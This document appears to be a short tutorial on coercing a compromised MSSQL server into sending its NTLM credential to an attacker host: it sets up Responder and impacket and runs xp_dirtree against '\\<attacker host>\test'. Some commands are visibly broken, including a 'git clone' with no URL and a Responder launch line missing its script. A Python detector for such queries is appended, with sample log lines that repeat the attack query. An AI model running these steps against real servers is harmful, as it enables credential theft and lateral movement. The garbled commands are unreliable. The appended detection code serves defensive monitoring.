SMB Relay Attack with MSSQL xp_dirtree Query to Steal NTLM Credential

Set Up the Request Capturer

Tools Installation.

git clone
cd Responder/
pip3 install -r requirements.txt
sudo apt install impacket-scripts -y

Run Responder to capture the requests.

sudo python3 -I eth0


Log in to the compromised MSSQL service with the MSSQL client.

sudo impacket-mssqlclient <user>:"<password>"@<target host> -p <port> -debug

After logging in, run the query that makes SQL Server authenticate over SMB to the capturing host, which exposes its NTLM credential.

xp_dirtree '\\<attacker host>\test';
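
Seen from the defending side, the query above leaves a recognizable trace in SQL audit data: xp_dirtree called with a UNC path to a host that is not a known file server. The following is an added example, not part of the original page; the tab-separated log layout (time, login, client, statement), the allowlist, the host names and the function name are all assumptions made for illustration.

```python
import re

# Matches xp_dirtree called with a UNC path argument, tolerating schema
# prefixes (master.. / master.dbo.), [bracket] quoting, EXEC and N'' literals.
XP_DIRTREE_UNC = re.compile(
    r"""\[?xp_dirtree\]?          # procedure name, optionally bracketed
        \s*                       # whitespace before the argument
        N?['"]                    # string literal start, optional N prefix
        \\\\(?P<host>[^\\'"]+)    # UNC prefix, then the remote host
        \\                        # separator before the share name
    """,
    re.IGNORECASE | re.VERBOSE,
)

ALLOWED_HOSTS = {"fs01.corp.example"}  # hypothetical approved file servers


def find_unc_dirtree(lines, allowed=ALLOWED_HOSTS):
    """Return one finding per audited statement that points xp_dirtree
    at a remote host outside the allowlist."""
    findings = []
    for line in lines:
        parts = line.rstrip("\n").split("\t", 3)
        if len(parts) != 4:
            continue  # skip malformed records instead of failing
        ts, login, client, stmt = parts
        for m in XP_DIRTREE_UNC.finditer(stmt):
            host = m.group("host").strip().lower()
            if host not in allowed:
                findings.append({"time": ts, "login": login,
                                 "client": client, "unc_host": host})
    return findings


SAMPLE_LOG = [  # constructed audit records, not taken from a real server
    "2024-05-01T10:00:01Z\tapp_ro\t10.0.5.20\tSELECT name FROM sys.databases",
    "2024-05-01T10:02:13Z\tapp_ro\t10.0.5.77\txp_dirtree '\\\\192.0.2.10\\test';",
    "2024-05-01T10:03:40Z\tbackup_svc\t10.0.5.9\tEXEC master..xp_dirtree N'\\\\FS01.corp.example\\backups', 1, 1",
    "2024-05-01T10:04:02Z\tapp_ro\t10.0.5.77\tEXEC [master].[dbo].[xp_dirtree] \"\\\\192.0.2.10\\x\"",
    "2024-05-01T10:05:00Z\tdba\t10.0.5.3\tEXEC xp_dirtree 'D:\\data', 1",
]

if __name__ == "__main__":
    for finding in find_unc_dirtree(SAMPLE_LOG):
        print(finding)
```

Findings like these are also a cue to check whether the database server can reach SMB (TCP 445) on arbitrary hosts at all, and whether the logins involved need EXECUTE on xp_dirtree.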